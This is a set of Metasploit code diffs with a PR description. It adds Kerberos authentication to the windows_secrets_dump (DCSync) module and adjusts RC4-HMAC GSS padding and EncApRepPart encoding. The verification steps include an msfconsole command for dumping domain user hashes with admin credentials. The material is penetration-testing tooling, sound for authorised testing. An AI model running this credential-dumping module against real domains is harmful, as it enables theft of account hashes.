           # Functions must be overridden by subclasses:

--- a/lib/rex/proto/kerberos/crypto/gss_new_encryption_type.rb
+++ b/lib/rex/proto/kerberos/crypto/gss_new_encryption_type.rb
@@ -37,7 +37,7 @@ module Rex
 
             tok_id = TOK_ID_GSS_WRAP
             filler = 0xFF
-            ec = calculate_ec(plaintext)
+            ec = calculate_ec(plaintext.length)
             rrc = calculate_rrc
 
             # RFC4121, Section 4.2.4
@@ -86,6 +86,10 @@ module Rex
             plaintext
           end
 
+          def calculate_encrypted_length(plaintext_len)
+            plaintext_len
+          end
+
           private
 
           #
@@ -105,13 +109,13 @@ module Rex
           # need to add "residue" (padding). This seems to be relevant only to DES, 
           # which leave padding removal as an exercise to the user (AES strips the padding
           # prior to returning it)
-          def calculate_ec(plaintext)
+          def calculate_ec(plaintext_len)
             padding_size = 1
             if padding_size == 0
               # No padding, so don't need to buffer up to a multiple of the pad length
               0
             else
-              (padding_size - (plaintext.length + GSS_HEADER_LEN)) % padding_size
+              (padding_size - (plaintext_len + GSS_HEADER_LEN)) % padding_size
             end
           end
 

--- a/lib/rex/proto/kerberos/crypto/gss_new_encryption_type.rb
+++ b/lib/rex/proto/kerberos/crypto/gss_new_encryption_type.rb
@@ -18,6 +18,7 @@ module Rex
 
           #
           # Encrypt the message, wrapping it in GSS structures
+          # @option options [Boolean] :use_acceptor_subkey Whether the encryption occurs with a negotiated subkey
           # @return [String, Integer, Integer] The encrypted data, the length of its header, and the length of padding added to it prior to encryption
           #
           def gss_wrap(plaintext, key, sequence_number, is_initiator, opts={})
@@ -54,6 +55,7 @@ module Rex
             result = [header + rotated, header_length + ec, ec]
           end
 
+          # @option options [Boolean] :use_acceptor_subkey Whether the encryption occurs with a negotiated subkey
           def gss_unwrap(ciphertext, key, expected_sequence_number, is_initiator, opts={})
             use_acceptor_subkey = opts.fetch(:use_acceptor_subkey) { true }
             # Handle wrap-around

--- a/lib/rex/proto/kerberos/crypto/rc4_hmac.rb
+++ b/lib/rex/proto/kerberos/crypto/rc4_hmac.rb
@@ -103,7 +103,7 @@ module Rex
             res
           end
 
-          def gss_unwrap(ciphertext, key, expected_sequence_number, is_initiator, use_acceptor_subkey: true)
+          def gss_unwrap(ciphertext, key, expected_sequence_number, is_initiator, opts={})
             # Always 32-bit sequence number
             expected_sequence_number &= 0xFFFFFFFF
 
@@ -157,15 +157,16 @@ module Rex
             raise Rex::Proto::Kerberos::Model::Error::KerberosError, 'Checksum error' unless verification_eight_checksum_bytes == eight_checksum_bytes
 
             # Remove padding, if present (seems MS may not send it back?)
-            pad_char = plaintext[-1]
-            if pad_char == "\x01"
-              plaintext = plaintext[0, plaintext.length-1]
+            pad_char = plaintext[-1].ord
+            if 1 <= pad_char && pad_char <= 8
+              plaintext = plaintext[0, plaintext.length-pad_char]
             end
 
             plaintext
           end
 
-          def gss_wrap(plaintext, key, sequence_number, is_initiator, use_acceptor_subkey: true)
+          def gss_wrap(plaintext, key, sequence_number, is_initiator, opts={})
+            is_dcerpc = opts.fetch(:is_dcerpc) { false }
             # Always 32-bit sequence number
             sequence_number &= 0xFFFFFFFF
 
@@ -175,8 +176,9 @@ module Rex
             seal_alg = 0x1000
             filler = 0xFFFF
             header = [tok_id, alg, seal_alg, filler].pack('nnnn')
-            # Add a byte of padding (see RFC1964 section 1.2.2.3) 
-            plaintext += "\x01"
+            # Add padding (see RFC1964 section 1.2.2.3)
+            pad_num = (8 - (plaintext.length % 8))
+            plaintext += (pad_num.chr * pad_num)
 
             send_seq = [sequence_number].pack('N')
             # See errata on RFC4757
@@ -185,7 +187,6 @@ module Rex
             send_seq += initiator_bytes
 
             confounder = Rex::Text::rand_text(CONFOUNDER_SIZE)
-            #confounder = ['cd85a6ad14bcf4a4'].pack('H*')
             chksum_input = usage_str(Rex::Proto::Kerberos::Crypto::KeyUsage::KRB_PRIV_ENCPART) + header + confounder
             ksign = OpenSSL::HMAC.digest('MD5', key.value, "signaturekey\x00")
             sgn_cksum = Rex::Text.md5_raw(chksum_input+plaintext)
@@ -219,14 +220,21 @@ module Rex
             token = header + encrypted_sequence_num + eight_checksum_bytes + encrypted_confounder
             size_prior = (token+encrypted).length
 
-            wrapped_token = wrap_pseudo_asn1(
-                ::Rex::Proto::Gss::OID_KERBEROS_5,
-                token + encrypted
-            )
+            if is_dcerpc
+              wrapped_token = wrap_pseudo_asn1(
+                  ::Rex::Proto::Gss::OID_KERBEROS_5,
+                  token
+              ) + encrypted
+            else
+              wrapped_token = wrap_pseudo_asn1(
+                  ::Rex::Proto::Gss::OID_KERBEROS_5,
+                  token + encrypted
+              )
+            end
             asn1_length = wrapped_token.length - size_prior
             token_length = asn1_length + token.length
 
-            [wrapped_token, token_length, 0x01]
+            [wrapped_token, token_length, pad_num]
           end
 
           #

--- a/lib/rex/proto/kerberos/crypto/rc4_hmac.rb
+++ b/lib/rex/proto/kerberos/crypto/rc4_hmac.rb
@@ -251,6 +251,11 @@ module Rex
             0
           end
 
+          def calculate_encrypted_length(plaintext_len)
+            # We add 1-8 bytes of padding, per RFC1964 section 1.2.2.3
+            plaintext_len + (8 - (plaintext_len % 8))
+          end
+
           private
 
           def usage_str(msg_type)

--- a/lib/rex/proto/kerberos/model.rb
+++ b/lib/rex/proto/kerberos/model.rb
@@ -18,6 +18,7 @@ module Rex
         AP_REQ = 14
         AP_REP = 15
         KRB_CRED = 22
+        ENC_AP_REP_PART = 27
         ENC_KRB_CRED_PART = 29
 
         module OID

--- a/lib/rex/proto/kerberos/model/enc_ap_rep_part.rb
+++ b/lib/rex/proto/kerberos/model/enc_ap_rep_part.rb
@@ -20,6 +20,9 @@ module Rex
           # @!attribute sequence_number
           #   @return [Integer] The initial sequence number to be used for future communications
           attr_accessor :sequence_number
+          # @!attribute enc_key_usage
+          #   @return [Rex::Proto::Kerberos::Crypto::KeyUsage,Integer] The enc key usage number for this object
+          attr_accessor :enc_key_usage
 
           # Decodes the Rex::Proto::Kerberos::Model::EncApRepPart from an input
           #
@@ -39,14 +42,78 @@ module Rex
             self
           end
 
-          # Encodes the Rex::Proto::Kerberos::Model::EncApRepPart into an ASN.1 String
+          # Encodes the Rex::Proto::Kerberos::Model::ApReq into an ASN.1 String
           #
           # @return [String]
           def encode
-            raise ::NotImplementedError, 'EncApRepPart encoding not supported'
+            to_asn1.to_der
+          end
+
+          # Encodes the Rex::Proto::Kerberos::Model::Authenticator into an ASN.1 String
+          #
+          # @return [String]
+          def encode
+            elems = []
+            elems << OpenSSL::ASN1::ASN1Data.new([encode_ctime], 0, :CONTEXT_SPECIFIC)
+            elems << OpenSSL::ASN1::ASN1Data.new([encode_cusec], 1, :CONTEXT_SPECIFIC)
+            elems << OpenSSL::ASN1::ASN1Data.new([encode_subkey], 2, :CONTEXT_SPECIFIC) if subkey
+            elems << OpenSSL::ASN1::ASN1Data.new([encode_sequence_number], 3, :CONTEXT_SPECIFIC) if sequence_number
+
+            seq = OpenSSL::ASN1::Sequence.new(elems)
+            seq_asn1 = OpenSSL::ASN1::ASN1Data.new([seq], ENC_AP_REP_PART, :APPLICATION)
+
+            seq_asn1.to_der
+          end
+
+          # Encrypts the Rex::Proto::Kerberos::Model::EncApRepPart
+          #
+          # @param etype [Integer] the crypto schema to encrypt
+          # @param key [String] the key to encrypt
+          # @return [String] the encrypted result
+          # @raise [NotImplementedError] if the encryption schema isn't supported
+          def encrypt(etype, key)
+            raise ::Rex::Proto::Kerberos::Model::Error::KerberosError, 'Missing enc_key_usage' unless enc_key_usage
+
+            data = self.encode
+            encryptor = Rex::Proto::Kerberos::Crypto::Encryption::from_etype(etype)
+            encryptor.encrypt(data, key, enc_key_usage)
           end
 
           private
+
+          # Encodes the cusec field
+          #
+          # @return [OpenSSL::ASN1::Integer]
+          def encode_cusec
+            bn = OpenSSL::BN.new(cusec.to_s)
+            int = OpenSSL::ASN1::Integer.new(bn)
+
+            int
+          end
+
+          # Encodes the ctime field
+          #
+          # @return [OpenSSL::ASN1::GeneralizedTime]
+          def encode_ctime
+            OpenSSL::ASN1::GeneralizedTime.new(ctime)
+          end
+
+          # Encodes the subkey field
+          #
+          # @return [String]
+          def encode_subkey
+            subkey.encode
+          end
+
+          # Encodes the sequence_number field
+          #
+          # @return [OpenSSL::ASN1::Integer]
+          def encode_sequence_number
+            bn = OpenSSL::BN.new(sequence_number.to_s)
+            int = OpenSSL::ASN1::Integer.new(bn)
+
+            int
+          end
 
           # Decodes a Rex::Proto::Kerberos::Model::EncApRepPart from an String
           #

--- a/lib/rex/proto/kerberos/model/enc_ap_rep_part.rb
+++ b/lib/rex/proto/kerberos/model/enc_ap_rep_part.rb
@@ -42,14 +42,7 @@ module Rex
             self
           end
 
-          # Encodes the Rex::Proto::Kerberos::Model::ApReq into an ASN.1 String
-          #
-          # @return [String]
-          def encode
-            to_asn1.to_der
-          end
-
-          # Encodes the Rex::Proto::Kerberos::Model::Authenticator into an ASN.1 String
+          # Encodes the Rex::Proto::Kerberos::Model::EncApReqPart into an ASN.1 String
           #
           # @return [String]
           def encode

--- a/modules/auxiliary/gather/windows_secrets_dump.rb
+++ b/modules/auxiliary/gather/windows_secrets_dump.rb
@@ -654,7 +654,7 @@ class MetasploitModule < Msf::Auxiliary
         framework_module: self,
         cache_file: datastore['Smb::Krb5Ccname'].blank? ? nil : datastore['Smb::Krb5Ccname'],
         mutual_auth: true,
-        is_dcerpc: true,
+        dce_style: true,
         use_gss_checksum: true,
         ticket_storage: kerberos_ticket_storage,
         offered_etypes: offered_etypes

--- a/modules/auxiliary/gather/windows_secrets_dump.rb
+++ b/modules/auxiliary/gather/windows_secrets_dump.rb
@@ -635,12 +635,42 @@ class MetasploitModule < Msf::Auxiliary
       password: datastore['SMBPass']
     )
 
+    auth_type = RubySMB::Dcerpc::RPC_C_AUTHN_WINNT
+    if datastore['SMB::Auth'] == Msf::Exploit::Remote::AuthOption::KERBEROS
+      fail_with(Msf::Exploit::Failure::BadConfig, 'The Smb::Rhostname option is required when using Kerberos authentication.') if datastore['Smb::Rhostname'].blank?
+      fail_with(Msf::Exploit::Failure::BadConfig, 'The SMBDomain option is required when using Kerberos authentication.') if datastore['SMBDomain'].blank?
+      fail_with(Msf::Exploit::Failure::BadConfig, 'The DomainControllerRhost is required when using Kerberos authentication.') if datastore['DomainControllerRhost'].blank?
+      offered_etypes = Msf::Exploit::Remote::AuthOption.as_default_offered_etypes(datastore['Smb::KrbOfferedEncryptionTypes'])
+      fail_with(Msf::Exploit::Failure::BadConfig, 'At least one encryption type is required when using Kerberos authentication.') if offered_etypes.empty?
+
+      kerberos_authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::LDAP.new(
+        host: datastore['DomainControllerRhost'],
+        hostname: datastore['Smb::Rhostname'],
+        proxies: datastore['Proxies'],
+        realm: datastore['SMBDomain'],
+        username: datastore['SMBUser'],
+        password: datastore['SMBPass'],
+        framework: framework,
+        framework_module: self,
+        cache_file: datastore['Smb::Krb5Ccname'].blank? ? nil : datastore['Smb::Krb5Ccname'],
+        mutual_auth: true,
+        is_dcerpc: true,
+        use_gss_checksum: true,
+        ticket_storage: kerberos_ticket_storage,
+        offered_etypes: offered_etypes
+      )
+
+      dcerpc_client.extend(Msf::Exploit::Remote::DCERPC::KerberosAuthentication)
+      dcerpc_client.kerberos_authenticator = kerberos_authenticator
+      auth_type = RubySMB::Dcerpc::RPC_C_AUTHN_GSS_NEGOTIATE
+    end
+
     dcerpc_client.connect
     vprint_status('Binding to DRSR...')
     dcerpc_client.bind(
       endpoint: RubySMB::Dcerpc::Drsr,
       auth_level: RubySMB::Dcerpc::RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
-      auth_type: RubySMB::Dcerpc::RPC_C_AUTHN_WINNT
+      auth_type: auth_type
     )
     vprint_status('Bound to DRSR')
 

--- a/spec/lib/msf/core/exploit/remote/kerberos/service_authenticator/base_spec.rb
+++ b/spec/lib/msf/core/exploit/remote/kerberos/service_authenticator/base_spec.rb
@@ -28,6 +28,16 @@ RSpec.describe Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base do
       end
     end
 
+    context 'when the response is invalid ASN1' do
+      let(:response) do
+        'abcd'
+      end
+
+      it 'raises a Kerberos decoding exception' do
+        expect { subject.validate_response!(response) }.to raise_error(::Rex::Proto::Kerberos::Model::Error::KerberosDecodingError, /Invalid GSS/)
+      end
+    end
+
     context 'when the response is accept-incomplete and contains a kerberos error' do
       let(:response) do
         "\xa1\x81\x89\x30\x81\x86\xa0\x03\x0a\x01\x01\xa1\x0b\x06\x09\x2a" \


### PR DESCRIPTION
This PR enables the use of Kerberos authentication with the `windows_secret_dump` module (DCSync).

It relies on a corresponding PR in the https://github.com/rapid7/ruby_smb repository (https://github.com/rapid7/ruby_smb/pull/253). Make sure you include those changes when testing.

## Verification

- [ ] Set up a domain controller (I've tested on 2022 and 2012)
- [ ] Obtain domain admin creds
- [ ] Start `msfconsole`
- [ ] `use windows_secrets_dump`
- [ ] `run rhosts=<IP> smbdomain=<domain> smbuser=<admin> smb::rhostname=<hostname> domaincontrollerrhost=<ip> smbpass=<password> smb::auth=kerberos action=domain`
- [ ] Verify that stealing user hashes succeeds
- [ ] Verify that this works using both RC4 and AES (you can test this by disabling AES in group policy, `gpupdate /force`, and purging the MSF kerberos ticket cache (`klist -d`)
- [ ] Verify that NTLM auth still works (`smb::auth=ntlm`)
- [ ] Verify that other kerberos modules still work (I've tested `winrm_cmd` and `psexec` modules)